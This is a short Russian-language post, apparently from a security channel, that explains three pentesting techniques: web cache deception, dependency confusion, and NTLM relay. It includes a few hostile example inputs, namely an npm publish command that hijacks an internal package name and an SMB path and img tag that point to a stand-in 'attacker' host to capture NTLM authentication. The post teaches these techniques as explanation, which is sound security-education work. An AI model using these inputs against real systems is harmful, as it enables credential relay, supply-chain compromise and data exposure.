3 лайфхака для пентестинга — 12 июня 2026 г. в 11:26:25.645
3 лайфхака для пентестинга 👋 Приветствую в мире цифровой безопасности! Расскажу ещё о трех полезных фишках про пентесте. ⏺Web Cache Deception - не путать с Cache Poisoning. Здесь задача не подменить кэш, а заставить CDN сохранить чувствительный ответ и отдать его другим пользователям. Например, приложение считает это динамической страницей: /account/settings А CDN видит статическое расширение: /account/settings/style.css Если роутинг настроен неаккуратно, персональная страница пользователя может попасть в публичный кэш. В результате другой человек получает чужие данные без взлома аккаунта. ⏺Dependency Confusion - атака на цепочку поставок через менеджеры пакетов. Допустим внутри компании используется пакет: internal-utils Разработчики устанавливают его автоматически из приватного репозитория. ⏺Если публичного пакета с таким именем не существует, атакующий может опубликовать его в npm, PyPI или другом реестре с более высокой версией: npm publish internal-utils@99.0.0 Некоторые CI/CD системы автоматически выберут внешний пакет вместо внутреннего. В итоге код хакера запускается прямо во время сборки. ⏺NTLM Relay без взлома пароля. Очень многие думают, что для компрометации Windows-инфраструктуры нужно получить хэш или пароль. На деле же иногда достаточно заставить систему самой пройти аутентификацию на подконтрольный ресурс. Например через: \\attacker\share или <img src="file://attacker/share"> После этого можно ретранслировать NTLM-аутентификацию на другие сервисы внутри сети. Если SMB Signing или Extended Protection настроены неправильно, атака позволяет получить доступ без подбора пароля и без его знания. 🤖Бесплатный ChatGPT

